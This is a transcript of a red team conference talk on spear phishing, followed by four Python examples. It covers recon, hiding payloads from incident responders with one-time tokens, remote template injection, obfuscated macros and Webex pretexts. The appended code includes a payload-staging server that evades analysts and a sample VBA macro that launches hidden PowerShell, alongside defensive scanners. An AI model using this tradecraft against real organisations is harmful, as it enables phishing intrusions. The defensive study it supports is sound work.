So it turns out that you are all in for a great treat. I was actually having a conversation with Jesse a little while ago, getting ready to introduce him, and I was amazed to learn that he is a former astronaut, which is pretty amazing: seven years on the International Space Station. He actually got bored of it, so now he leads a red team, and if you believe all that, he's got a lot to tell us about the spear phishing experience. So he's going to tell us about the real-world trial and error he went through building and running a red team, and also why to do things in a very OPSEC-safe way and how to get a foothold with spear phishing. And of course, in the tradition here, we're going to start off the way we did there: to our comrades, a shot of vodka. Cheers, good luck everyone.

So my talk is called Purple Haze: The Spear Phishing Experience, featuring me. Just a little bit about me, if we've never met before: my name is Jesse Nebling. I'm on an internal red team, a former consultant; I was consulting for about seven years before I joined this team this year. It's not a Big Four consulting firm or accounting firm, not allowed to say the name right now, but I'm based out of Seattle, Washington. I'm mostly focused on Windows exploitation. Purple team advocate; really, I'm in for the collaboration between red teams and blue teams, because that's really how we all get better. On the side I do some music production, electronic music, play guitar in a punk band, Free Parking, check them out, they're cool. And I'm just stoked to be here overall.

During this I just want you to think, and take this to heart: during a red team operation, treat the attackers like a real adversary. I think that's important; that's how you're going to learn to figure out how to detect certain things and figure out how to respond to them properly. If you're not doing that, you're not going to get much value from the red team. And then afterwards, make sure you have collaboration.

So what's the point of my
talk? I'm going to walk through some of the trial and error I've had as a red teamer, and also what blue teams have done, when I was consulting and now with the blue team I work with directly; pinpoint some areas that hopefully will help some of you think a little bit differently, from an attacker's mindset, about tightening security and potentially help you foster some new detection controls; and just give the blue teamers in the room a glimpse of how adversaries think and how we're plotting against you.

Overall I'm going to go over recon, some adversarial OPSEC that we put in place to figure out if the blue team is catching on to what we're doing, and also dive into malicious attachments, some old stuff, some new stuff. Hopefully you learn something from it.

First, recon. We look to see what's publicly out there: WHOIS, subdomains, all that jazz, everyone knows that. Then we start trying to craft our spear phishing campaigns: looking for things like job openings that have the technologies that your business is using, looking up social media to see if your employees are saying what tools you have in your environment, anything that we can really pull together to understand what your tech stack is and also potentially craft a campaign to go against you. We also look for things like services that might be available, and we could potentially look for things like single-factor auth on your external environment so we could attack that later. And I think the last bullet point is a big one; I'm going to show you a screenshot on the next slide, but bouncing emails off the domains, you can pull a bunch of good information from that.

Really what we're using all of this for: the firewall rules. Looking for the things in the WHOIS of your public environment, we will create firewall rules for our C2 servers so we could potentially narrow the scope; if you have a third-party sandbox or something like that, it won't be able to pull our payloads and actually run their sandboxing against
it, and so on. Looking for those single-factor auth entry points, looking for anything that is actually environmentally unique to your environment so we can key in on that and craft our payloads further.

So the left image, hopefully you can see it, but that's bouncing an email off of some random company, might be a real company, I don't know, but they actually have the internal domain name readily available. This is more for if you have SMTP servers on-prem; cloud services prevent a lot of this. And then you can also see at the bottom it says pphosted.com, so that also gives me the knowledge that your corporation or your business is using Proofpoint, so that'll help me craft how I'm going to attack you through attachments or whatever it is.

The other one is a pretty old technique, but it's still viable; I've used it a ton of times when I was consulting. Looking for MS Lync, or if you're still using Lync for some reason, or Skype for Business, you can basically send an NTLM authentication request to that server and pull back a base64-encoded blob that basically has all of your internal domain information and also the internal server name. I have some references, hopefully the slides will get out sometime soon, that you can click and look through more.

So some potential areas of detection for this: anyone that's mass downloading externally hosted files to pull metadata to see what versions your software is within Office or Adobe or anything like that, so we can craft things against that. Emails potentially being bounced against non-existent email accounts, that's what I showed in that one image; this is a lot harder if your business has a lot of clients, but if you can potentially whitelist specific domains, you can crack down on that a little bit more for maybe a smaller business. And then just brute forcing against single-factor auth, that's pretty easily detected; a lot of people still don't detect on that, though.

I put in a couple
points that I've struggled with when I was doing these assessments. It costs more time to the attacker overall if I can't figure out what your egress points are from your network from the publicly available stuff, anything that's registered under your company's name; if you have a third party, or your internet service provider is what's pulled from that recon, then I'm not going to be able to change the firewall rules to narrow down on what can access my payloads. If your environment has multi-factor all over the place, it's going to be much harder for me to spray anything; I usually try not to do that anyway because it's too noisy, but some people do. If employees only have general job descriptions, basically anything that's not related to your tech stack, then that's going to make it harder for me to figure out what's in your environment so I can further do some tests against those tools and potentially get by them. And then the last one: wildcard emails aren't allowed, so I can't bounce off, or you have a cloud service for your email, so you won't be able to pull that internal domain information from those. I made a toolkit for looking up some basic recon for networking; you can follow that if you like.

So the next one I'm running into: adversarial OPSEC. Testing dropper malware is a topic on its own; I'm not going to cover it too much today, but just know that an adversary that's dedicated enough will download free trials of AV, get trials of your EDR products, and figure out ways around them. You just have to kind of assume that in your environment and look for anomalies. That's just something that you need to keep in mind, and if you want to talk about this afterwards I'm happy to; not going to cover it in this talk.

So this is one technique that I've done and figured out worked pretty well to figure out if incident response or the blue team was onto my campaign. I would set up basically a web server that is not related
to any of my other C2 infrastructure, and whatever payload I'm sending will basically send a benign web request to an image or something like that. Once that image gets pulled or requested, I'll get a text message. This works twofold: I'll get a text message, one, if the actual victim has clicked my link, and I know that I'm about to get a shell, or two, if there are multiple requests happening and I'm getting a ton of text messages, I'm like, oh shit, the blue team's probably on me, let me burn down that infrastructure and start somewhere else. I've also seen some people do UNC path injection and pull NTLMv2 hashes over the internet if you have SMB outbound; you probably shouldn't, but I've seen it at like 50% of the clients that I worked at. So I just have some sample code for the text messages for the red teamers in the room, and then under that, for the blue teamers in the room, I actually have the user agents that Office products use. It might be helpful for people that are sandboxing the payloads or any of the documents that they're receiving, or if they think something is malicious, you could potentially use this to tune your sandbox a little bit more.

This is another technique that I came up with: basically using one-time-use tokens. Whenever your payloads are staging a request out to a server that I own, there's a database set up that will have all the usages of that token. If the token gets requested one time from my payload, then it will actually serve up the legit payload and start the process of downloading and executing whatever the flow is. You can set however many times you want it to work, but if the token gets requested more than that, then that is probably a blue team, so it will redirect to something benign, and then the incident response teams won't be able to actually pull that down. Also, don't request my payloads with wget; that's just going to get
redirected. I've seen it a lot; it's just something that I need to point out.

So some areas of potential detection there: Office, any document-reading process that has outbound connectivity. This is kind of a no-brainer, but if some people are new, it might be good information: any type of outbound network connectivity should be looked at further. There's a chance it's not malicious, a better chance it probably is. Any malicious links from non-trusted domains; obviously that's a much harder one to crack down on if you have a big environment. Those user agents that I called out earlier. And then this one is kind of counterintuitive to the first bullet of my incident response and defense tips: if there's one of those campaigns that's more mass phishing, that has the tokens that are being used, and you want to pull that payload, you could potentially look for those unread emails, click that link, download the payload and analyze it that way. And that kind of goes into the next tip, which is: don't do that. You're better off just pulling the payload from one of the users that already clicked it and analyzing it that way, and that coincides with that wget request I was talking about earlier. This one is just an overarching one, you probably hate hearing it, but just assume the adversary knows how to get around your tools. You're going to get low-hanging fruit and inexperienced attackers, but look for things like that guy in finance opening up PowerShell and executing commands, because that's obviously going to be something that shouldn't happen or wouldn't happen normally. And then the last one, I kind of touched on it: disable your SMB outbound traffic; that's ridiculous.

So, malicious attachments. There are email security and sandboxing services out there that you can rely on, you can hold on to them as a crutch, but I wouldn't; it's not a silver bullet by any means. You can modify some publicly
known payloads pretty easily and get by them, and I'm going to run through a couple of things that we do as red teamers.

So, one. This is kind of an older tactic, but it still works wonderfully, so I want to make sure that everyone is aware of it: it's called remote template injection. The idea behind it is you have a normal, non-malicious document, and it actually calls out to an Office template that is hosted on a staging server elsewhere; that template has the malicious code in it. So once the document is opened, it pulls the template down, and then there's a macro in the document. I kind of wrote the steps for the red teamers if they're curious about doing it; you just edit an XML file. But for the blue teamers in the room, this basically allows .docx files, which typically don't have macros in them, to be used as a malicious document, so that will get by quite a few email filters. The other side of this is, when this actually occurs, you can take the template down. It depends if you have the firewall rules in place, but if you don't, you can take the template down while the email sandbox is doing its thing against the document. Once it's making those requests out, you'll see third-party sandboxes in Azure or AWS requesting your server a ton of times looking for the template. Once that dies down, it's usually between five and 20 minutes, you can just rehost the template, because the sandbox will send that document to the user, the victim, whoever you're targeting, and they'll open it, and hopefully by that time you have the template back up and it'll just pull the template down and you get that malicious code execution. There are some actually pretty unique indicators for this, for the templates being requested by Office products, and I just put those there for the blue teamers as reference; these slides will be up later, but it's a pretty unique set of requests that gets sent out once it's pulling those templates.

This is the tried and
true method; everyone knows about VBA macros. It's gone through a million iterations; it's gotten to the point where you kind of have to hide in plain sight. Windows Defender is catching on to basically everything, and I assume that the other AV vendors are going to catch up eventually. Things like WMI execution are old school; PowerShell cradles, that'll get caught most likely; hiding variables in document properties, XML data. And then I just came up with a method of actually hiding code in the alternative text of images, and the week I was about to execute, Microsoft put in a new alert that actually says that it's an obfuscated macro, so you can't do that anymore. But there's a really good talk on this at DerbyCon, I think last year, 2018, where they talk a lot more about this, and it's definitely a good one to view for blue teamers. Basically we're doing things like reversing strings, just replacing characters, hiding it straight in the normal macro instead of pulling different properties of the document. Staging the payloads: you don't want to put all of your malicious code in the payload, because if that gets caught, then your C2 infrastructure is burned, so having that outside, as that next step, is a good way to kind of thwart the burning of the infrastructure you set up and took so long to do. And then just executing outside of Office ancestry. This is a pretty well-known way to do things; EDR tools nowadays all detect on if you're executing as a child process of an Office product, but as an attacker we always have to execute outside of Office. I put an example up of just that hiding-in-plain-sight macro for the blue teamers, so if you're analyzing something you can see what is actually occurring here; I cut out the execution side because that's all public knowledge.

So this one is actually something that I came up with as well, but it was based off of a talk by Stan Hegt at DerbyCon 2018. Excel 4.0 macros, for those of you that don't know,
is an old language within Excel that basically allows you to hook Windows APIs and just call DLLs directly through Excel, so it's pretty awesome. The method that he showed off was really more around doing direct shellcode injection, but I didn't like that that much, because unless you change your shellcode to execute outside of the Office product, it'll execute as a child process of Excel, which will get caught by an EDR product. So I wanted to do something different, and also everything there will give away your C2 infrastructure if that's the case. So I came up with my own attack flow: I used Excel 4.0 as a downloader, basically just calling the Windows DLL urlmon to download a file, and then you can hybrid it and actually call a VBA function as well through Excel 4.0, so you can do that for execution. Since in the VBA it doesn't say Auto_Open, it'll get by a lot of email filters; their email filters aren't really looking for these Excel 4.0 macros yet. I also included some of the user agents that get requested when this occurs, just so you also know what's going on and have something to write off of if you can tune your sandboxes.

So some points of discovery. The first one's obvious; hopefully everyone knows that if a document is making outbound network connectivity, then there's probably an issue. That probably doesn't happen, but sometimes does, but it's something to look into at least. VBA scripts run from documents: EDR tools nowadays look into these; at least you can flag on them with a basic setup, but again, if it's not your accounting guy that is running macros all day, then there's probably some issue going on, some malicious activity. Executing as a child process of Office products: if that ever occurs and you don't have an EDR solution, then look into that; that probably shouldn't be happening either. Any old-format versions of Office documents, so .doc, .xls: you can actually prevent those from even being opened in
your environment through GPO, so that's an approach you could take if you don't have legacy documents, which, you know, let's get to the 21st century now. And then the last one, I think, is probably the biggest one: looking for these functions specifically within the macros. The first one is Shell COM, so you can call that CLSID and basically execute as a child process of Explorer instead of the Office document itself. The rest of them are basically used as downloaders or other ways of execution. The one that I really wanted to point out was the ActiveSheet ... .Visible = False. I use this all the time in phishing campaigns because it's how I sway users to click something: basically what that is doing is making an image invisible, so I'll just overlay an image on a document that says, hey, this is in privacy mode, this is in protected mode, enable content to view the actual document. So that will make somebody that's not too experienced just click Enable Content; the image disappears, it looks legit, they don't really know what's going on. So that's definitely a bigger one that I haven't seen too many people call out. And then the other two are just really around the hiding-in-plain-sight aspect of things.

So for the incident response tip here: sandbox a payload on a system that is actually representative of your domain, because we did all that recon in the first place, so we potentially know your internal domain name. If it's just a third-party sandbox service, there's a chance that it's not connected to your domain, and if it's not, then we'll just cut execution right there and not do anything malicious. So that's a pretty important step; I see a lot of people fail doing that, but it's something that you can at least be cognizant of moving forward. And then the last one: this is a really well-known tool, oledump. If you don't know that, you should probably look into it; it's a really good blue teaming tool that you can scrape VBA macros with, and they also just made a
plug-in for Excel 4.0 macros to see what's actually being executed, and you can scrape that content and actually do an analysis against it to see if it's malicious. And I just linked Didier Stevens' tool, oledump, at the bottom.

So this last one is pretty new. There's a talk on this tomorrow, so hopefully he goes into more detail; I'm going to be brief about it, though. The overall concept here is you can send a meeting event to somebody and it'll just pop up on their calendar. There's been some big news about it recently with scammers doing it. I took it kind of to the next level and did it more as an adversary, where I would just attach a Webex meeting and then say, hey, an automated update didn't get pushed to your box and we need to do a manual update on your system. They would join the Webex and you just talk them through giving you mouse and keyboard control, download the payload, say, hey, you're updated, open up the Office product or whatever and say, oh yeah, the version looks like it's up to date, you're good to go, if you have any questions go to your local IT desk. So that works really well, and it's something that hasn't really been done, or I haven't seen talked about too much, but I've popped shells that way. There are a lot more scammers doing it with just random links to something malicious that say you want a free iPhone, but just ignore that.

So some points of discovery for that are, again, meetings originating from non-trusted domains; this is going to be much harder for bigger organizations, but if you know your client base, you could potentially flag on that. The other one is any meetings that appear without an actual email invite; that's an indicator. Honestly, I don't know a way to go in and look at that as a red teamer, but it's something to think about and potentially look at as blue teamers. And then as a tip, just get the business to disable automatic adding of invitations to calendars, because that'll make
sure that they don't get that notification pop-up that, oh, I have a meeting in 10 minutes, I have to make sure I join this. That's really the only tip I have right now; hopefully tomorrow at the collision talk he talks a little bit more about it. But yeah, so that's it for me. This is actually my first con talk, so thank you so much for your time, I appreciate it, and if you want to talk a little bit more afterwards, meet me at the bar.

Sorry if I spoiled your OPSEC by saying where you were working for the past seven years, the space station. Thanks very much. We're going to be outside for some Q&A, and I think we have a break now as some red team people check in, so thank you.
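The recon section of the talk mentions pulling internal domain and server names out of the base64 blob that a Lync / Skype for Business server returns to an NTLM authentication request. That blob is an NTLM Type 2 (CHALLENGE_MESSAGE) whose TargetInfo AV_PAIRs carry exactly those names. The following is an added example, not the speaker's code: it decodes such a challenge per MS-NLMP. The sample challenge is constructed here (the domain "CORP", host "LYNCFE01" and the example.local names are placeholders), and the talk does not name the HTTP endpoint the negotiate is sent to, so that part is left to the reader.

```python
"""Decode an NTLM Type 2 (CHALLENGE_MESSAGE) to recover internal names.

Added example, not the speaker's code. A server that answers an NTLM
negotiate returns a base64 challenge whose target info lists the NetBIOS and
DNS domain / computer names. The sample challenge below is CONSTRUCTED.
"""
import base64
import struct
from datetime import datetime, timedelta, timezone

AV_NAMES = {
    1: "netbios_computer", 2: "netbios_domain", 3: "dns_computer",
    4: "dns_domain", 5: "dns_tree", 7: "timestamp",
}

# Minimal NEGOTIATE_MESSAGE (Type 1) to send as "Authorization: NTLM <b64>".
NEGOTIATE_B64 = base64.b64encode(
    b"NTLMSSP\x00" + struct.pack("<I", 1) + struct.pack("<I", 0x00088207) + b"\x00" * 16
).decode()


def challenge_from_header(www_authenticate: str) -> str:
    """Pull the base64 blob out of a 'WWW-Authenticate: NTLM <b64>' value."""
    for part in www_authenticate.split(","):
        part = part.strip()
        if part.upper().startswith("NTLM "):
            return part[5:].strip()
    raise ValueError("no NTLM challenge in header")


def filetime_to_dt(raw: bytes) -> datetime:
    ticks = struct.unpack("<Q", raw)[0]            # 100 ns units since 1601-01-01
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def parse_challenge(b64: str) -> dict:
    raw = base64.b64decode(b64)
    if raw[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", raw, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", raw, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", raw, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", raw, 40)   # TargetInfoFields
    info = {"target_name": raw[tn_off:tn_off + tn_len].decode("utf-16-le"),
            "flags": hex(flags)}
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                          # walk the AV_PAIR list
        av_id, av_len = struct.unpack_from("<HH", raw, pos)
        pos += 4
        if av_id == 0:                             # MsvAvEOL
            break
        val = raw[pos:pos + av_len]
        pos += av_len
        key = AV_NAMES.get(av_id, f"av_{av_id}")
        if av_id == 7:
            info[key] = filetime_to_dt(val).isoformat()
        elif av_id in AV_NAMES:
            info[key] = val.decode("utf-16-le")
        else:
            info[key] = val.hex()
    return info


def build_sample_challenge() -> str:
    """CONSTRUCTED Type 2 message standing in for a real server reply."""
    def u16(s): return s.encode("utf-16-le")
    def av(i, v): return struct.pack("<HH", i, len(v)) + v
    target = u16("CORP")
    pairs = (av(2, u16("CORP")) + av(1, u16("LYNCFE01"))
             + av(4, u16("corp.example.local"))
             + av(3, u16("lyncfe01.corp.example.local"))
             + av(5, u16("corp.example.local"))
             + av(7, struct.pack("<Q", 132_000_000_000_000_000))
             + av(0, b""))
    hdr_len = 56                                    # fixed header incl. Version
    flags = 0x00000001 | 0x00010000 | 0x00800000    # UNICODE | TYPE_DOMAIN | TARGET_INFO
    msg = (b"NTLMSSP\x00" + struct.pack("<I", 2)
           + struct.pack("<HHI", len(target), len(target), hdr_len)
           + struct.pack("<I", flags)
           + b"\x11" * 8 + b"\x00" * 8               # ServerChallenge, Reserved
           + struct.pack("<HHI", len(pairs), len(pairs), hdr_len + len(target))
           + b"\x06\x01\xb1\x1d\x00\x00\x00\x0f"     # Version
           + target + pairs)
    return base64.b64encode(msg).decode()


if __name__ == "__main__":
    header = "Negotiate, NTLM " + build_sample_challenge()
    for k, v in parse_challenge(challenge_from_header(header)).items():
        print(f"{k:18} {v}")
```

Against a live server you would send `NEGOTIATE_B64` in an `Authorization: NTLM` header to an endpoint that offers NTLM, feed the `WWW-Authenticate` value of the 401 to `challenge_from_header`, and read `dns_domain` / `netbios_domain` / `dns_computer` from the result; no credentials are involved, which is why the talk lists it as recon rather than brute force.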
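The adversarial OPSEC section describes two checks: a canary image whose hit count tells the operator whether only the target opened the lure or the blue team is replaying it, and a one-time staging token that serves the real payload once and something benign afterwards (or to analyst tooling such as wget). The following is an added example, not the speaker's "sample code for the text messages": it implements both decisions behind a small HTTP server. Alerting is reduced to a callback where the talk uses text messages; the `/img/` and `/s/` paths, the token names, and the blocked User-Agent fragments other than wget are assumptions.

```python
"""Canary hits and one-time staging tokens for red team OPSEC (added example).

Constructed example, not the speaker's code. Canary: 1 hit means the target
clicked; more hits mean IR or a sandbox is replaying the lure. Staging gate:
a token has a fetch budget (1 = one-time); over budget, an unknown token, or
an analyst-style client all get the benign page instead of the stage.
"""
from __future__ import annotations

import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Callable, Dict
from urllib.parse import urlparse

ANALYST_AGENTS = ("wget", "curl", "python-requests")   # wget is from the talk; rest assumed
BENIGN = b"<html><body>It works!</body></html>"
STAGE = b"[constructed stand-in for the stage-2 bytes]"


class Canary:
    """Counts fetches of the canary image and alerts on every one."""

    def __init__(self, alert: Callable[[str], None]):
        self.hits: Dict[str, int] = {}
        self._alert = alert

    def record(self, path: str) -> int:
        n = self.hits[path] = self.hits.get(path, 0) + 1
        if n == 1:
            self._alert(f"{path}: first hit, expect a callback shortly")
        else:
            self._alert(f"{path}: hit #{n}, likely blue team, consider burning infra")
        return n


class StagingGate:
    """Token -> fetch budget. Serve the stage only while budget lasts."""

    def __init__(self, budgets: Dict[str, int], alert: Callable[[str], None]):
        self._budget = dict(budgets)
        self._seen: Dict[str, int] = {}
        self._alert = alert
        self._lock = threading.Lock()

    def decide(self, token: str, user_agent: str) -> str:
        """Return 'payload' or 'benign' and record the request."""
        ua = (user_agent or "").lower()
        with self._lock:
            n = self._seen[token] = self._seen.get(token, 0) + 1
            budget = self._budget.get(token)
            if budget is None:
                return "benign"                      # unknown token: never serve
            if any(a in ua for a in ANALYST_AGENTS):
                self._alert(f"{token}: analyst client {user_agent!r}, served benign")
                return "benign"
            if n > budget:
                self._alert(f"{token}: request #{n} exceeds budget {budget}, burn it")
                return "benign"
            return "payload"

    def seen(self, token: str) -> int:
        return self._seen.get(token, 0)


def make_handler(canary: Canary, gate: StagingGate):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            path = urlparse(self.path).path
            if path.startswith("/img/"):             # canary image (assumed path)
                canary.record(path)
                self._reply(200, b"\x89PNG\r\n\x1a\n", "image/png")
            elif path.startswith("/s/"):             # staging token (assumed path)
                verdict = gate.decide(path[3:], self.headers.get("User-Agent", ""))
                if verdict == "payload":
                    self._reply(200, STAGE, "application/octet-stream")
                else:
                    self._reply(200, BENIGN, "text/html")
            else:
                self._reply(404, BENIGN, "text/html")

        def _reply(self, code: int, body: bytes, ctype: str):
            self.send_response(code)
            self.send_header("Content-Type", ctype)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):                # keep stdout quiet
            pass
    return Handler


if __name__ == "__main__":
    def page(msg: str) -> None:                      # stand-in for the SMS hook
        print("ALERT:", msg)
    srv = HTTPServer(("127.0.0.1", 8080), make_handler(Canary(page), StagingGate({"7f3a": 1}, page)))
    srv.serve_forever()
```

The server is the same for both red and blue readers: a defender who fetches `/s/<token>` a second time, or with wget, sees only the benign page, which is why the talk advises pulling the payload from a host where a user already clicked rather than re-requesting the link.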
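The remote template injection section says the document itself is macro-free and "you just edit an XML file" so that Word pulls a macro-bearing template from a staging server when the document opens. The XML in question is the relationship part `word/_rels/settings.xml.rels`, whose `attachedTemplate` relationship normally points at a local `.dotm`. The following is an added example for blue teamers, not the speaker's code: it opens a `.docx` as the OOXML zip it is and reports any attached-template relationship whose external target is an http(s) URL or UNC path. The two sample documents are constructed in memory; the staging URL and share name are placeholders.

```python
"""Flag .docx files whose attached template points to a remote host.

Added example, not the speaker's code. Remote template injection puts a URL
in the attachedTemplate relationship of word/_rels/settings.xml.rels; Word
fetches it on open. This scanner walks every .rels part in the package and
reports such targets. Sample documents are CONSTRUCTED.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"
REMOTE = re.compile(r"^(https?://|\\\\)", re.I)          # http(s) URL or UNC path


def find_remote_templates(docx_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (rels_part, target) for every remote attachedTemplate relationship."""
    hits: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"
                        and REMOTE.match(target)):
                    hits.append((name, target))
    return hits


# --- CONSTRUCTED minimal package parts, enough for the scanner to run -------
CONTENT_TYPES = (
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
    '</Types>')
ROOT_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
             f'Type="{R_NS}/officeDocument" Target="word/document.xml"/></Relationships>')
DOCUMENT = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>'
            'Enable content to view this document.</w:t></w:r></w:p></w:body></w:document>')


def build_docx(template_target: Optional[str]) -> bytes:
    """CONSTRUCTED .docx; with a target it mirrors what the attacker edits in."""
    settings = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                + ('<w:attachedTemplate r:id="rId1"/>' if template_target else '')
                + '</w:settings>')
    settings_rels = (f'<Relationships xmlns="{REL_NS}">'
                     + (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                        f'Target="{template_target}" TargetMode="External"/>'
                        if template_target else '')
                     + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", DOCUMENT)
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, target in (("clean", None),
                          ("injected", "http://staging.example.invalid/t.dotm")):
        print(label, find_remote_templates(build_docx(target)))
```

A hit is worth triage even when the template host is currently down: the talk notes operators take the template offline while the sandbox is fetching and rehost it five to twenty minutes later, so a sandbox verdict of "nothing happened" says little about the document itself.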
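The VBA and Excel 4.0 sections list what to look for once macro source has been extracted (the talk points to Didier Stevens' oledump and its Excel 4.0 plugin): COM object creation by CLSID to execute under Explorer, Shell, downloaders such as urlmon / URLDownloadToFile, Excel 4.0 CALL / REGISTER, and the `.Visible = False` trick that hides the "enable content" lure image. The talk also names the hiding-in-plain-sight idioms that defeat naive keyword matching: reversed strings and character replacement. The following is an added example, not the speaker's macro or slide: it first statically undoes those idioms, then matches the function families above. The sample macro is constructed, and the rule names are mine.

```python
"""Triage extracted macro source for the indicators the talk lists (added example).

Not the speaker's code. Input is macro text already pulled from the document
(for example with oledump). Step 1 resolves StrReverse("..."), Chr(n) runs,
Replace("a!b", "!", "") and "a" & "b" concatenation so hidden strings become
readable; step 2 matches the function families the talk calls out.
The sample macro below is CONSTRUCTED.
"""
import re
from typing import Dict, List

RULES: Dict[str, re.Pattern] = {
    # Shell COM object via CLSID moniker, runs as a child of Explorer
    "com_via_clsid": re.compile(r'GetObject\s*\(\s*"new:\{?[0-9A-F-]{36}\}?', re.I),
    "shell_exec":    re.compile(r"\b(Shell|ShellExecute|WScript\.Shell|Shell\.Application)\b", re.I),
    "downloader":    re.compile(r"\b(URLDownloadToFile|urlmon|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest)\b", re.I),
    "xlm_call":      re.compile(r"=\s*(CALL|REGISTER|EXEC)\s*\(", re.I),      # Excel 4.0
    "hidden_lure":   re.compile(r"Shapes\s*\(.*?\)\s*\.Visible\s*=\s*False", re.I),
    "wmi_exec":      re.compile(r"winmgmts:|Win32_Process", re.I),
    "auto_exec":     re.compile(r"\b(Auto_Open|AutoOpen|Workbook_Open|Document_Open)\b", re.I),
}

_CHR_RUN = re.compile(r"Chr\s*\(\s*\d+\s*\)(?:\s*&\s*Chr\s*\(\s*\d+\s*\))*", re.I)
_STRREV = re.compile(r'StrReverse\s*\(\s*"([^"]*)"\s*\)', re.I)
_REPLACE = re.compile(r'Replace\s*\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def _chr_run(m: re.Match) -> str:
    codes = re.findall(r"Chr\s*\(\s*(\d+)\s*\)", m.group(0), flags=re.I)
    return '"' + "".join(chr(int(c)) for c in codes) + '"'


def deobfuscate(src: str, rounds: int = 4) -> str:
    """Resolve the string-hiding idioms until the text stops changing."""
    for _ in range(rounds):
        before = src
        src = _CHR_RUN.sub(_chr_run, src)
        src = _STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', src)
        src = _REPLACE.sub(lambda m: '"' + m.group(1).replace(m.group(2), m.group(3)) + '"', src)
        src = _CONCAT.sub(r'"\1\2"', src)
        if src == before:
            break
    return src


def scan(src: str) -> Dict[str, List[str]]:
    """Map rule name -> matching lines of the deobfuscated source."""
    found: Dict[str, List[str]] = {}
    for lineno, line in enumerate(deobfuscate(src).splitlines(), 1):
        for name, pat in RULES.items():
            if pat.search(line):
                found.setdefault(name, []).append(f"{lineno}: {line.strip()}")
    return found


# CONSTRUCTED sample: hidden lure image, CLSID reversed, command built from pieces.
SAMPLE_VBA = r'''
Sub Workbook_Open()
    ActiveSheet.Shapes("Picture 1").Visible = False
    Dim o As Object
    Set o = GetObject(StrReverse("}000045355444-E94A-EC11-972C-02690731{:wen"))
    Dim c As String
    c = Replace("p!o!w!e!r!s!h!e!l!l", "!", "") & Chr(32) & Chr(45) & Chr(119) & " hidden"
    o.ShellExecute c, "", "", "open", 0
End Sub
'''

if __name__ == "__main__":
    for rule, lines in scan(SAMPLE_VBA).items():
        print(rule)
        for ln in lines:
            print("   ", ln)
```

The deobfuscation step is deliberately narrow (literal arguments only); anything it cannot fold is left in place, so a macro that builds strings at runtime still surfaces through the `shell_exec`, `downloader` and `hidden_lure` rules, and the Excel 4.0 `CALL` / `REGISTER` rule covers the urlmon downloader path the talk describes without relying on an Auto_Open in the VBA.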